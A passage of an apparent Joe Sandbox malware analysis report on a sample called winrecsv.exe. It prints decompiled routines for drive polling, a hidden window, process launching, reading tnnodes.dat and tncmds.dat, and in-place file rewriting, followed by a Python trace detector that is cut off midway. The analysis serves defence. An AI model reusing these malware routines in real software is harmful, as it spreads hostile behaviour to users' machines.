                                                                                  				intOrPtr _t38;
                                                                                  				struct %anon54 _t43;
                                                                                  				intOrPtr _t63;
                                                                                  				void* _t68;
                                                                                  				void* _t69;
                                                                                  				void* _t70;
                                                                                  
                                                                                  				Sleep(0x3e8); // executed
                                                                                  				GetModuleFileNameW(0, "C:\Windows\winrecsv.exe", 0x104);
                                                                                  				_t34 = E0040D530("C:\Windows\winrecsv.exe"); // executed
                                                                                  				_t69 = _t68 + 4;
                                                                                  				 *0x414410 = _t34;
                                                                                  				while(1 != 0) {
                                                                                  					_t36 = E004048C0(); // executed
                                                                                  					_v8 = _t36;
                                                                                  					_v12 = 2;
                                                                                  					while(_v12 <= 0x19) {
                                                                                  						_t38 = E00404860(_v8, _v12,  &_v24); // executed
                                                                                  						_t69 = _t69 + 0xc;
                                                                                  						_v16 = _t38;
                                                                                  						_v3152 = _v16;
                                                                                  						if(_v3152 == 2 || _v3152 == 4) {
                                                                                  							GetVolumeInformationW( &_v24,  &_v3148, 0x105, 0, 0,  &_v2616, 0, 0);
                                                                                  							GetDiskFreeSpaceExW( &_v24, 0,  &_v2612, 0);
                                                                                  							_push(0);
                                                                                  							_push(0x40000000);
                                                                                  							_t63 = _v2608;
                                                                                  							_push(_t63);
                                                                                  							_t43 = _v2612.LowPart;
                                                                                  							_push(_t43);
                                                                                  							L0040F1B0();
                                                                                  							_push(_t63);
                                                                                  							wsprintfW( &_v556, L" (%dGB)", _t43);
                                                                                  							_t70 = _t69 + 0x10;
                                                                                  							if((_v3148 & 0x0000ffff) == 0) {
                                                                                  								wsprintfW( &_v3148, L"Unnamed volume");
                                                                                  								_t70 = _t70 + 8;
                                                                                  							}
                                                                                  							wsprintfW( &_v2604, L"%s%s",  &_v3148,  &_v556);
                                                                                  							E00404BD0( &_v24,  &_v2604, _v2616, ( &_v556 & 0xffffff00 | _v16 == 0x00000004) & 0x000000ff);
                                                                                  							_t69 = _t70 + 0x20;
                                                                                  						}
                                                                                  						_v12 = _v12 + 1;
                                                                                  					}
                                                                                  					Sleep(0x7d0); // executed
                                                                                  				}
                                                                                  				ExitThread(0);
                                                                                  			}

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 004050BE
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\winrecsv.exe,00000104), ref: 004050D0
                                                                                    • Part of subcall function 0040D530: CreateFileW.KERNELBASE(P@,80000000,00000001,00000000,00000003,00000000,00000000,004050E0), ref: 0040D550
                                                                                    • Part of subcall function 0040D530: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D565
                                                                                    • Part of subcall function 0040D530: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040D572
                                                                                  • ExitThread.KERNEL32 ref: 0040523A
                                                                                    • Part of subcall function 004048C0: GetLogicalDrives.KERNELBASE ref: 004048C6
                                                                                    • Part of subcall function 004048C0: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00404914
                                                                                    • Part of subcall function 004048C0: RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00404941
                                                                                    • Part of subcall function 004048C0: RegCloseKey.ADVAPI32(?), ref: 0040495E
                                                                                  • Sleep.KERNELBASE(000007D0), ref: 0040522D
                                                                                    • Part of subcall function 00404860: lstrcpyW.KERNEL32 ref: 004048B3
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040516F
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00405184
                                                                                  • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040519F
                                                                                  • wsprintfW.USER32 ref: 004051B2
                                                                                  • wsprintfW.USER32 ref: 004051D2
                                                                                  • wsprintfW.USER32 ref: 004051F5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filewsprintf$CloseSleep$ChangeCreateDiskDrivesExitFindFreeInformationLogicalModuleNameNotificationOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                  • String ID: (%dGB)$%s%s$C:\Windows\winrecsv.exe$Unnamed volume
                                                                                  • API String ID: 899515741-3032203380
                                                                                  • Opcode ID: f1572abb67f03b3e23ee054d932ea7d3a2152c95165b90b0fb75db5c9ca44455
                                                                                  • Instruction ID: a985ed85a03a777e582de5830084f45234a9f7b72307fd88a6662299d951ba90
                                                                                  • Opcode Fuzzy Hash: f1572abb67f03b3e23ee054d932ea7d3a2152c95165b90b0fb75db5c9ca44455
                                                                                  • Instruction Fuzzy Hash: 67418371D00214ABE754DB94DC45FEE7778EB48704F1085AAF209B51D0DA785B88CF6A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 68%
                                                                                  			E00404000() {
                                                                                  				struct HWND__* _v8;
                                                                                  				struct tagMSG _v36;
                                                                                  				struct _WNDCLASSEXW _v84;
                                                                                  				short _v596;
                                                                                  				unsigned int _t20;
                                                                                  				short _t25;
                                                                                  				struct HWND__* _t27;
                                                                                  				void* _t39;
                                                                                  				void* _t40;
                                                                                  
                                                                                  				do {
                                                                                  					_v84.cbSize = 0;
                                                                                  					memset( &(_v84.style), 0, 0x2c);
                                                                                  					_t40 = _t39 + 0xc;
                                                                                  					_v84.cbSize = 0x30;
                                                                                  					_v84.lpfnWndProc = E00403DB0;
                                                                                  					_v84.hInstance = GetModuleHandleW(0);
                                                                                  					_v84.lpszClassName =  &_v596;
                                                                                  					do {
                                                                                  						Sleep(1); // executed
                                                                                  						_t20 = GetTickCount();
                                                                                  						wsprintfW( &_v596, L"%x%X", GetTickCount(), _t20 >> 1);
                                                                                  						_t40 = _t40 + 0x10;
                                                                                  						_t25 = RegisterClassExW( &_v84); // executed
                                                                                  					} while ((_t25 & 0x0000ffff) == 0);
                                                                                  					_t27 = CreateWindowExW(0, _v84.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _v84.hInstance, 0); // executed
                                                                                  					_v8 = _t27;
                                                                                  					if(_v8 != 0) {
                                                                                  						while(GetMessageA( &_v36, 0, 0, 0) > 0) {
                                                                                  							TranslateMessage( &_v36);
                                                                                  							DispatchMessageA( &_v36);
                                                                                  						}
                                                                                  						goto L7;
                                                                                  					}
                                                                                  					break;
                                                                                  					L7:
                                                                                  				} while (0 != 0);
                                                                                  				ExitThread(0);
                                                                                  			}

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                  • String ID: %x%X$0
                                                                                  • API String ID: 716646876-225668902
                                                                                  • Opcode ID: f6d5b7525540a58df187482176236c9ba1dfeb2eb460690e0bb65cbcf38e7b1f
                                                                                  • Instruction ID: 19d221db94b3e63cef1269c4be0118e099b5cb739eae60d914623c84e45eccf5
                                                                                  • Opcode Fuzzy Hash: f6d5b7525540a58df187482176236c9ba1dfeb2eb460690e0bb65cbcf38e7b1f
                                                                                  • Instruction Fuzzy Hash: 3021F170A40318ABEB109BE0DC49FEE7B78BB44701F508129F705B61D0DBB955448B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040A020() {
                                                                                  				void* _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v20;
                                                                                  				long _v24;
                                                                                  				DWORD* _v28;
                                                                                  				signed int _v32;
                                                                                  				void* _t39;
                                                                                  				intOrPtr _t41;
                                                                                  				void* _t42;
                                                                                  				void* _t74;
                                                                                  
                                                                                  				InitializeCriticalSection(0x414e4c);
                                                                                  				_v12 = 0;
                                                                                  				while(_v12 < 0x200) {
                                                                                  					E00409D70( *((intOrPtr*)(0x4133b8 + _v12 * 4)), E0040C210(), 0); // executed
                                                                                  					_t74 = _t74 + 0xc;
                                                                                  					_v12 = _v12 + 1;
                                                                                  				}
                                                                                  				_t39 = CreateFileW("C:\Users\frontdesk\tnnodes.dat", 0x80000000, 0, 0, 3, 0, 0); // executed
                                                                                  				_v8 = _t39;
                                                                                  				if(_v8 != 0xffffffff) {
                                                                                  					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                  					if(_v16 != 0) {
                                                                                  						_v20 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                                                  						if(_v20 != 0) {
                                                                                  							_v24 = GetFileSize(_v8, 0);
                                                                                  							_v28 = 0;
                                                                                  							_v32 = 0;
                                                                                  							while(_v28 < _v24 && _v32 < 0x200) {
                                                                                  								E00409D70( *((intOrPtr*)(_v20 + _v32 * 8)), E0040C210() -  *((intOrPtr*)(_v20 + 4 + _v32 * 8)), 0);
                                                                                  								_t74 = _t74 + 0xc;
                                                                                  								_v28 =  &(_v28[2]);
                                                                                  								_v32 = _v32 + 1;
                                                                                  							}
                                                                                  							UnmapViewOfFile(_v20);
                                                                                  						}
                                                                                  						CloseHandle(_v16);
                                                                                  					}
                                                                                  					CloseHandle(_v8); // executed
                                                                                  				}
                                                                                  				E00409A90(); // executed
                                                                                  				_t41 =  *0x414e68; // 0x930628
                                                                                  				_t42 = E0040BF50(_t41, 0, E00409960, 0, 0, 0); // executed
                                                                                  				return _t42;
                                                                                  			}
                                                                                  0x0040a138
                                                                                  0x0040a138
                                                                                  0x0040a142
                                                                                  0x0040a142
                                                                                  0x0040a14c
                                                                                  0x0040a14c
                                                                                  0x0040a152
                                                                                  0x0040a164
                                                                                  0x0040a16a
                                                                                  0x0040a175

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(00414E4C,?,?,?,?,?,?,004068A0), ref: 0040A02B
                                                                                  • CreateFileW.KERNELBASE(C:\Users\user\tnnodes.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A07D
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040A09E
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040A0BD
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040A0D2
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040A138
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A142
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040A14C
                                                                                    • Part of subcall function 0040C210: NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                    • Part of subcall function 0040C210: RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Strings
                                                                                  • C:\Users\user\tnnodes.dat, xrefs: 0040A078
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                  • String ID: C:\Users\user\tnnodes.dat
                                                                                  • API String ID: 439099756-238434947
                                                                                  • Opcode ID: 2c2dbae3a8763e6bc590333b25d0c604acd08149e9b9b32ea208a451803659fc
                                                                                  • Instruction ID: acc5326b5384c580b36ed7733cff79295e061d02a32601855545f98bc6dcfb13
                                                                                  • Opcode Fuzzy Hash: 2c2dbae3a8763e6bc590333b25d0c604acd08149e9b9b32ea208a451803659fc
                                                                                  • Instruction Fuzzy Hash: 4D413A74E40308ABDB10DFA4CC4ABAEB774BB44704F208569E6117B2C1C6B96A51CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 287 404200-404232 InitializeCriticalSection CreateFileW 288 404325-404328 287->288 289 404238-404253 CreateFileMappingW 287->289 290 404259-404272 MapViewOfFile 289->290 291 40431b-40431f CloseHandle 289->291 292 404311-404315 CloseHandle 290->292 293 404278-40428a GetFileSize 290->293 291->288 292->291 294 40428d-404291 293->294 295 404293-40429a 294->295 296 404307-40430b UnmapViewOfFile 294->296 297 40429c 295->297 298 40429e-4042b1 call 40b4f0 295->298 296->292 297->296 301 4042b3 298->301 302 4042b5-4042ca 298->302 301->296 303 4042da-404305 call 4040f0 302->303 304 4042cc-4042d8 call 408fb0 302->304 303->294 304->296
                                                                                  C-Code - Quality: 100%
                                                                                  			E00404200() {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				long _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				void* _t35;
                                                                                  				intOrPtr _t45;
                                                                                  				void* _t66;
                                                                                  				void* _t67;
                                                                                  
                                                                                  				InitializeCriticalSection(0x4143f0);
                                                                                  				_t35 = CreateFileW("C:\Users\frontdesk\tncmds.dat", 0x80000000, 0, 0, 3, 0, 0); // executed
                                                                                  				_v8 = _t35;
                                                                                  				if(_v8 != 0xffffffff) {
                                                                                  					_v12 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                  					if(_v12 == 0) {
                                                                                  						L14:
                                                                                  						return CloseHandle(_v8);
                                                                                  					}
                                                                                  					_v16 = MapViewOfFile(_v12, 4, 0, 0, 0);
                                                                                  					if(_v16 == 0) {
                                                                                  						L13:
                                                                                  						CloseHandle(_v12);
                                                                                  						goto L14;
                                                                                  					}
                                                                                  					_v20 = GetFileSize(_v8, 0);
                                                                                  					_v24 = _v16;
                                                                                  					while(_v20 != 0) {
                                                                                  						if(_v20 >= 0x100) {
                                                                                  							_t45 = E0040B4F0(_v24, _v24);
                                                                                  							_t67 = _t66 + 4;
                                                                                  							_v28 = _t45;
                                                                                  							if(_v28 != 0) {
                                                                                  								_v20 = _v20 - 0x100;
                                                                                  								if(_v20 >=  *((intOrPtr*)(_v28 + 0xc))) {
                                                                                  									E004040F0(_v24, _v28, _v24,  *((intOrPtr*)(_v28 + 0xc)) + 0x100, 0);
                                                                                  									_t66 = _t67 + 0x10;
                                                                                  									_v20 = _v20 -  *((intOrPtr*)(_v28 + 0xc));
                                                                                  									continue;
                                                                                  								}
                                                                                  								E00408FB0(_v28);
                                                                                  								break;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						break;
                                                                                  					}
                                                                                  					UnmapViewOfFile(_v16);
                                                                                  					goto L13;
                                                                                  				}
                                                                                  				return _t35;
			}

                                                                                  0x0040420b
                                                                                  0x00404225
                                                                                  0x0040422b
                                                                                  0x00404232
                                                                                  0x0040424c
                                                                                  0x00404253
                                                                                  0x0040431b
                                                                                  0x00000000
                                                                                  0x0040431f
                                                                                  0x0040426b
                                                                                  0x00404272
                                                                                  0x00404311
                                                                                  0x00404315
                                                                                  0x00000000
                                                                                  0x00404315
                                                                                  0x00404284
                                                                                  0x0040428a
                                                                                  0x0040428d
                                                                                  0x0040429a
                                                                                  0x004042a2
                                                                                  0x004042a7
                                                                                  0x004042aa
                                                                                  0x004042b1
                                                                                  0x004042be
                                                                                  0x004042ca
                                                                                  0x004042f1
                                                                                  0x004042f6
                                                                                  0x00404302
                                                                                  0x00000000
                                                                                  0x00404302
                                                                                  0x004042d0
                                                                                  0x00000000
                                                                                  0x004042d5
                                                                                  0x00000000
                                                                                  0x004042b3
                                                                                  0x00000000
                                                                                  0x0040429c
                                                                                  0x0040430b
                                                                                  0x00000000
                                                                                  0x0040430b
                                                                                  0x00404328

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(004143F0,?,?,?,?,?,0040686A), ref: 0040420B
                                                                                  • CreateFileW.KERNELBASE(C:\Users\user\tncmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,0040686A), ref: 00404225
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00404246
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00404265
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040427E
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040430B
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404315
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040431F
                                                                                  Strings
                                                                                  • C:\Users\user\tncmds.dat, xrefs: 00404220
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                  • String ID: C:\Users\user\tncmds.dat
                                                                                  • API String ID: 3956458805-1428318279
                                                                                  • Opcode ID: b3648e58c9864d6b8b8bc5f3b80ef7b3f109043bc3ac7d8c402e44e73b7fa38e
                                                                                  • Instruction ID: 273e13aa2dc466d5bf8d435bda3035c4f53c51da1c9f1d325813a3c854b8a587
                                                                                  • Opcode Fuzzy Hash: b3648e58c9864d6b8b8bc5f3b80ef7b3f109043bc3ac7d8c402e44e73b7fa38e
                                                                                  • Instruction Fuzzy Hash: 2C3133B4E00209EFDB14DFA4DC49FAEB770AB88704F208569F601772C1D7B96581CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 309 40d740-40d79e memset CreateProcessW 310 40d7a0-40d7ad Sleep 309->310 311 40d7af-40d7d3 ShellExecuteW 309->311 312 40d7e6-40d7e9 310->312 313 40d7e4 311->313 314 40d7d5-40d7e2 Sleep 311->314 313->312 314->312
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D740(char _a4) {
                                                                                  				void* _v8;
                                                                                  				struct _PROCESS_INFORMATION _v24;
                                                                                  				struct _STARTUPINFOW _v100;
                                                                                  				intOrPtr _v104;
                                                                                  				int _t20;
                                                                                  
                                                                                  				memset( &_v100, 0, 0x44);
                                                                                  				_v24.hProcess = 0;
                                                                                  				_v24.hThread = 0;
                                                                                  				_v24.dwProcessId = 0;
                                                                                  				_v24.dwThreadId = 0;
                                                                                  				_v100.cb = 0x44;
                                                                                  				_v100.dwFlags = 1;
                                                                                  				_v100.wShowWindow = 5;
                                                                                  				_t11 =  &_a4; // 0x40656e
                                                                                  				_t20 = CreateProcessW(0,  *_t11, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24); // executed
                                                                                  				if(_t20 != 1) {
                                                                                  					_t12 =  &_a4; // 0x40656e
                                                                                  					_v8 = ShellExecuteW(0, L"open",  *_t12, 0, 0, 0);
                                                                                  					_v104 = _v8;
                                                                                  					if(_v104 <= 0x20) {
                                                                                  						return 0;
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					return 1;
                                                                                  				}
                                                                                  				Sleep(0x3e8); // executed
                                                                                  				return 1;
			}

                                                                                  0x0040d74e
                                                                                  0x0040d758
                                                                                  0x0040d75b
                                                                                  0x0040d75e
                                                                                  0x0040d761
                                                                                  0x0040d764
                                                                                  0x0040d76b
                                                                                  0x0040d777
                                                                                  0x0040d78f
                                                                                  0x0040d795
                                                                                  0x0040d79e
                                                                                  0x0040d7b5
                                                                                  0x0040d7c6
                                                                                  0x0040d7cc
                                                                                  0x0040d7d3
                                                                                  0x00000000
                                                                                  0x0040d7e4
                                                                                  0x0040d7da
                                                                                  0x00000000
                                                                                  0x0040d7e0
                                                                                  0x0040d7a5
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040D74E
                                                                                  • CreateProcessW.KERNELBASE ref: 0040D795
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 0040D7A5
                                                                                  • ShellExecuteW.SHELL32(00000000,open,ne@,00000000,00000000,00000000), ref: 0040D7C0
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D7DA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$CreateExecuteProcessShellmemset
                                                                                  • String ID: $D$ne@$open
                                                                                  • API String ID: 2222793131-3207568236
                                                                                  • Opcode ID: 5f6903af65bfe535200d81666b806fcc276bdec7bf2871f08574f27a7109b4d3
                                                                                  • Instruction ID: 933796f3933de1520c7fb78abd268757ff0d70a2e837ae2d9ddd379650c1acbf
                                                                                  • Opcode Fuzzy Hash: 5f6903af65bfe535200d81666b806fcc276bdec7bf2871f08574f27a7109b4d3
                                                                                  • Instruction Fuzzy Hash: 05110071E84308BBEB14DFD4DD46BDE7774AB18700F20412AF609BB2C0D7B55A448B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 315 40d580-40d5c1 CreateFileW 316 40d6d3-40d6d7 315->316 317 40d5c7-40d5e2 CreateFileMappingW 315->317 320 40d6d9-40d6f9 CreateFileW 316->320 321 40d72d-40d735 316->321 318 40d5e8-40d601 MapViewOfFile 317->318 319 40d6c9-40d6cd CloseHandle 317->319 322 40d607-40d61d GetFileSize 318->322 323 40d6bf-40d6c3 CloseHandle 318->323 319->316 324 40d721-40d72a call 408fb0 320->324 325 40d6fb-40d71b WriteFile CloseHandle 320->325 326 40d623-40d636 call 40b4c0 322->326 327 40d6b5-40d6b9 UnmapViewOfFile 322->327 323->319 324->321 325->324 326->327 332 40d638-40d647 326->332 327->323 332->327 333 40d649-40d678 call 40ae60 332->333 333->327 336 40d67a-40d6a0 call 409800 333->336 336->327 339 40d6a2-40d6ae call 408fb0 336->339 339->327
                                                                                  C-Code - Quality: 83%
                                                                                  			E0040D580(WCHAR* _a4) {
                                                                                  				void* _v8;
                                                                                  				long _v12;
                                                                                  				void* _v16;
                                                                                  				DWORD* _v20;
                                                                                  				char _v21;
                                                                                  				void* _v28;
                                                                                  				void* _v32;
                                                                                  				char _v48;
                                                                                  				void* _t54;
                                                                                  				void* _t56;
                                                                                  				void* _t62;
                                                                                  				void* _t64;
                                                                                  				DWORD* _t70;
                                                                                  				void* _t73;
                                                                                  				void* _t103;
                                                                                  
                                                                                  				_v21 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_t54 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0); // executed
                                                                                  				_v16 = _t54;
                                                                                  				if(_v16 == 0xffffffff) {
                                                                                  					L12:
                                                                                  					if(_v8 != 0) {
                                                                                  						_t56 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                  						_v16 = _t56;
                                                                                  						if(_v16 != 0xffffffff) {
                                                                                  							_v21 = 1;
                                                                                  							WriteFile(_v16, _v8, _v12,  &_v12, 0); // executed
                                                                                  							CloseHandle(_v16);
                                                                                  						}
                                                                                  						E00408FB0(_v8);
                                                                                  					}
                                                                                  					return _v21;
                                                                                  				}
                                                                                  				_t62 = CreateFileMappingW(_v16, 0, 2, 0, 0, 0); // executed
                                                                                  				_v28 = _t62;
                                                                                  				if(_v28 == 0) {
                                                                                  					L11:
                                                                                  					CloseHandle(_v16);
                                                                                  					goto L12;
                                                                                  				}
                                                                                  				_t64 = MapViewOfFile(_v28, 4, 0, 0, 0); // executed
                                                                                  				_v32 = _t64;
                                                                                  				if(_v32 == 0) {
                                                                                  					L10:
                                                                                  					CloseHandle(_v28);
                                                                                  					goto L11;
                                                                                  				} else {
                                                                                  					_v12 = GetFileSize(_v16, 0);
                                                                                  					if(_v12 > 0x100) {
                                                                                  						_t70 = E0040B4C0(_v32, _v32);
                                                                                  						_t103 = _t103 + 4;
                                                                                  						_v20 = _t70;
                                                                                  						if(_v20 != 0 && _v20[6] == _v12 - 0x100) {
                                                                                  							_v12 = _v20[6];
                                                                                  							_t73 = E0040AE60(_v32 + 0x100,  &(_v20[2]), 0x10, _v32 + 0x100, _v12);
                                                                                  							_t103 = _t103 + 0x10;
                                                                                  							_v8 = _t73;
                                                                                  							if(_v8 != 0) {
                                                                                  								E00409800(_v8, _v12,  &_v48);
                                                                                  								_t103 = _t103 + 0xc;
                                                                                  								asm("repe cmpsd");
                                                                                  								if(0 != 0) {
                                                                                  									E00408FB0(_v8);
                                                                                  									_t103 = _t103 + 4;
                                                                                  									_v8 = 0;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					UnmapViewOfFile(_v32);
                                                                                  					goto L10;
                                                                                  				}
                                                                                  			}
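Read together with the API list for this function, the routine opens the path in _a4 read-only (0x80000000 = GENERIC_READ, 3 = OPEN_EXISTING), maps it read-only (2 = PAGE_READONLY, 4 = FILE_MAP_READ), passes the view to E0040B4C0 and continues only if that returns a structure whose field at index 6 equals the file size minus 0x100. E0040AE60 is then given the data after that 0x100-byte prefix together with a 16-byte field from the structure, E00409800 is run over the result and the outcome is compared with repe cmpsd against an operand the decompiler did not recover, and on success the same path is re-created (0x40000000 = GENERIC_WRITE, 2 = CREATE_ALWAYS) and overwritten with the result. The callees are not shown on this page, so the nature of the transformation cannot be stated from it; what is observable is a read-map-close followed by a re-create-and-write on the same path. The Python below is added here as an example and is not part of the Joe Sandbox report or of the sample: it searches an API trace for exactly that sequence. The trace line shape (Api(key=value, ...) = retval) and the sample lines are constructed for the example; real hook or sandbox output differs, and only parse_call() needs adapting.

```python
import re
from collections import defaultdict

# Win32 constants matching the literals in the decompiled routine:
# CreateFileW(..., 0x80000000, ..., 3, ...) then CreateFileW(..., 0x40000000, ..., 2, ...).
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
CREATE_ALWAYS = 2
INVALID_HANDLE_VALUE = 0xFFFFFFFF

# Trace line shape assumed for this example: Api(key=value, key=value) = retval
# (constructed format; argument values never contain ", ").
CALL_RE = re.compile(r"^(\w+)\((.*)\)\s*=\s*(\S+)$")


def parse_call(line):
    """Split one trace line into (api, {arg: value}, retval); None if it is not a call."""
    m = CALL_RE.match(line.strip())
    if not m:
        return None
    api, raw_args, ret = m.groups()
    args = {}
    for part in raw_args.split(", "):
        key, _, value = part.partition("=")
        if key:
            args[key.strip()] = value.strip().strip('"')
    return api, args, ret


def find_inplace_rewrites(trace_lines):
    """Return [(path, bytes_written)] for every file that went through the E0040D580
    sequence: opened GENERIC_READ/OPEN_EXISTING, mapped, closed after mapping, then
    re-opened GENERIC_WRITE/CREATE_ALWAYS on the same path and written.
    Per-path stages: 1 opened read-only, 2 mapped, 3 closed after mapping,
    4 re-created for writing (a WriteFile on that handle is the hit)."""
    handle_path = {}          # open file handle -> path
    handle_access = {}        # open file handle -> dwDesiredAccess
    mapping_file = {}         # section handle -> file handle it was created from
    stage = defaultdict(int)  # path -> stage reached
    hits = []

    for line in trace_lines:
        parsed = parse_call(line)
        if parsed is None:
            continue
        api, a, ret = parsed

        if api == "CreateFileW":
            if int(ret, 0) == INVALID_HANDLE_VALUE:
                continue                     # failed open: nothing happens, as in L12
            path, access = a["path"], int(a["access"], 0)
            disposition = int(a["disposition"], 0)
            handle_path[ret] = path
            handle_access[ret] = access
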